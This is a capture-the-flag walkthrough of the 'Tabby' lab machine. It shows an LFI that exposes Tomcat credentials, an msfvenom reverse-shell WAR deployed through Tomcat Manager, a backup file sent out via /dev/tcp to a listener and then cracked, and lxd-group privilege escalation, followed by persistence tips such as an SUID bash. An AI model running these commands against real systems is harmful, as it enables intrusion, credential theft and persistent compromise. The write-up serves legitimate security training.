Tabby is an easy Linux box that starts off by identifying and leveraging an LFI vulnerability to find tomcat credentials. The credentials can be used to gain a foothold on the system by deploying a malicious .war file via Tomcat Manager. Internal enumeration finds a password protected backup file, and it can be cracked to recover the password. The password turns out to be reused by the user on the box. The user is a member of the lxd group, and this group can be leveraged to gain root access.
Reconnaissance
Nmap
→ root@iamf «tabby» «10.10.14.30»
$ nmap -sC -sV -oA nmap/initial-tabby 10.10.10.194-sC: default scan script-sV: scan for version-oA: save output in three major formats
nmap returns with the following output.
Nmap scan report for 10.10.10.194
Host is up (0.13s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Mega Hosting
8080/tcp open http Apache Tomcat
|_http-title: Apache Tomcat
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelService detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Jun 27 09:48:49 2020–1 IP address (1 host up) scanned in 31.77 seconds
It discovered three open ports: 22 (SSH), 80 (HTTP), and 8080 (HTTP).
TCP 80 — Web (megahosting.htb)
Visiting port 80 shows a kind of company website called “Mega Hosting” which offers hosting services.
The domain name of this site is revealed from the email address and also from the page source
I’ll add the hostname megahosting.htb to my /etc/hosts file.
10.10.10.194 megahosting.htbThe company statement about data breach points to this link http://megahosting.htb/news.php?file=statement.
They mentioned a tool, but I have no idea what tool it is.
I performed directory bruteforce with gobuster, but it didn’t find any interesting results.
TCP 8080 — Tomcat
Visiting port 8080 shows the Tomcat default page.
Both “manager webapp” and “host-manager webapp” are asking for credentials. I tried using Tomcat’s default credentials, but it didn’t work.
Before moving on, I’ll take note on these:
/etc/tomcat9/tomcat-users.xml- “tomcat9”
Foothold
Local File Inclusion
I found out the file parameter on http://megahosting.htb/news.php?file=statement is vulnerable to LFI. I could leverage it to read the /etc/passwd file
The LFI can be identified after assuming the website is hosted at
/var/www/html/megahosting/. So the payload would be ../../../../file/to/read
According to the Tomcat default page, it says that “Users are defined in /etc/tomcat9/tomcat-users.xml”, so I tried to leverage the LFI to read that file but it returned with a blank.
I can search for the exact location of the installed Tomcat with basic Linux knowledge and service fingerprint from the nmap result.
First, in Linux, every software application is most likely installed in one of the following directories:
- /usr/share/appname
- /usr/lib/appname
- /opt/appname
- /var/lib/appname
Second, according to the nmap result, OpenSSH version 8.2p1 and Apache version 2.4.41. Therefore, I can guess the box is most likely running Ubuntu 20.04 (Focal Fossa). Now I can just narrow the search, and find the install location of Tomcat9 on Ubuntu 20.04.
The search brought me to this location /usr/share/tomcat9/etc/tomcat-users.xml, and that seems to be the correct location.
The credentials is tomcat:$3cureP4s5w0rd123!
Reverse Shell via Tomcat Manager
Based on the tomcat-users.xml file, tomcat has two roles, admin-gui and manager-script. That means the credentials can not be used on “manager-webapp” (/manager), but it provides access to HTML GUI or “host-manager-webapp” (/host-manager).
From this article, the second roles which is manager-script provides all the functionality that manager-gui provides but using the text interface instead of the html gui. The full documentation of what you can do with this role is available here.
With this role, there is a deploy feature that provides the ability to deploy a java web application packaged as WAR files. I can abuse this by creating a malicious WAR file that is embedded with java or jsp reverse shell using msfvenom.
The issued command below will generate a malicious war file.
→ root@iamf «tabby» «10.10.14.30»
$ msfvenom -p java/jsp_shell_reverse_tcp lhost=10.10.14.30 lport=9000 -f war -o iamf.warI can use curl to upload the file to the tomcat server.
→ root@iamf «tabby» «10.10.14.30»
$ curl -u 'tomcat:$3cureP4s5w0rd123!' -T iamf.war http://10.10.10.194:8080/manager/text/deploy?path=/iamf.war-u: for credential [username:password]-T: for transfer file
I’ll setup listener, and then trigger the payload via curl.
→ root@iamf «tabby» «10.10.14.30»
$ curl http://10.10.10.194:8080/iamf.warMy listener now have a shell.
Privilege Escalation
Internal Enumeration
Manual enumeration with the find command discovers a backup file in zip format that is owned by user ash
tomcat@tabby:/$ find / -type f -user ash 2>/dev/null | grep -v 'proc'
I’ll transfer the backup file to my Kali.
tomcat@tabby:/$ cat /var/www/html/files/16162020_backup.zip > /dev/tcp/10.10.14.30/9001On my listener
→ root@iamf «tabby» «10.10.14.30»
$ nc -nvlp 9001 > 16162020_backup.zip
listening on [any] 9001 ...
connect to [10.10.14.30] from (UNKNOWN) [10.10.10.194] 65056Recover Backup Password
The backup file is protected by a password. I’ll try to recover the password using John the Ripper from my Windows machine, but first I have to convert it to hash format using zip2john.
→ root@iamf «tabby» «10.10.14.30»
$ zip2john 16162020_backup.zip > backup.hashThe password got cracked instantly. The password is admin@it.
Escalate to Ash
It turns out that the backup password is reused by ash
tomcat@tabby:/$ su ash
su ash
Password: admin@itI’ll put my SSH public key to the authorized_keys file on ash home directory for better shell.
ash@tabby:~/.ssh$ echo 'ssh-rsa AAAAB3NzaC1y....H/y1qmY6ipsfAec=' > authorized_keysNow I can login with my SSH key.
→ root@iamf «tabby» «10.10.14.30»
$ ssh -i id_rsa ash@10.10.10.194
ash@tabby:~$ sudo -l
[sudo] password for ash:
Sorry, user ash may not run sudo on tabby.
ash@tabby:~$ id
uid=1000(ash) gid=1000(ash) groups=1000(ash),4(adm),24(cdrom),30(dip),46(plugdev),116(lxd)Escalate to root via LXC
I found out that user ash is a member of the lxd group. This group can be abused by mounting the whole root file system into a container, and then I can access it freely from inside the container.
I’ll follow this article as reference.
First, I’ll create an alpine image on my attacking machine, which is Kali Linux.
→ root@iamf «tabby» «10.10.14.30»
$ git clone https://github.com/saghul/lxd-alpine-builder
→ root@iamf «tabby» «10.10.14.30»
$ cd lxd-alpine-builder
→ root@iamf «tabby» «10.10.14.30»
$ ./build-alpineSample output:
Once it’s done, there will be an image file called alpine-v3.12-x86_64-blablabla. In my case, it is alpine-v3.12-x86_64-20201107_1900.tar.gz. I’ll send the image to Tabby via scp.
→ root@iamf «tabby» «10.10.14.30»
$ scp -i id_rsa alpine-v3.12-x86_64-20201107_1900.tar.gz ash@10.10.10.194:/tmpOn Taby, I’ll initialize the lxd storage pool, profile, etc..
ash@tabby:~$ lxd initThen I’ll import the image, and then initialize a container from the image I’ve imported.
ash@tabby:~$ lxc image import /tmp/alpine-v3.12-x86_64-20201107_1900.tar.gz --alias iamf-img
ash@tabby:~$ lxc init iamf-img img-container -c security.privileged=trueNext, I’ll mount the root file system of the host to the container at /mnt/root.
ash@tabby:~$ lxc config device add img-container iamf-test disk source=/ path=/mnt/root
Device iamf-test added to img-containerAfter that, I’ll start the container. I can confirm it is running using lxc ls.
ash@tabby:~$ lxc start img-container
Now I can just interact with the container and grab the root flag at /mnt/root/root/root.txt
ash@tabby:~$lxc exec img-container /bin/sh
Modifications on /mnt/root/ will also affect the root file system of the host. Other things I can do from the container is:
- Adding a persistent user via
/etc/passwd(/mnt/root/etc/passwd) - Adding a SUID bash (
cp bash /mnt/root/tmp/bash; chmod 4755 /mnt/root/tmp/bash) - Enabling root login and put my ssh public key to the root authorized_keys file.
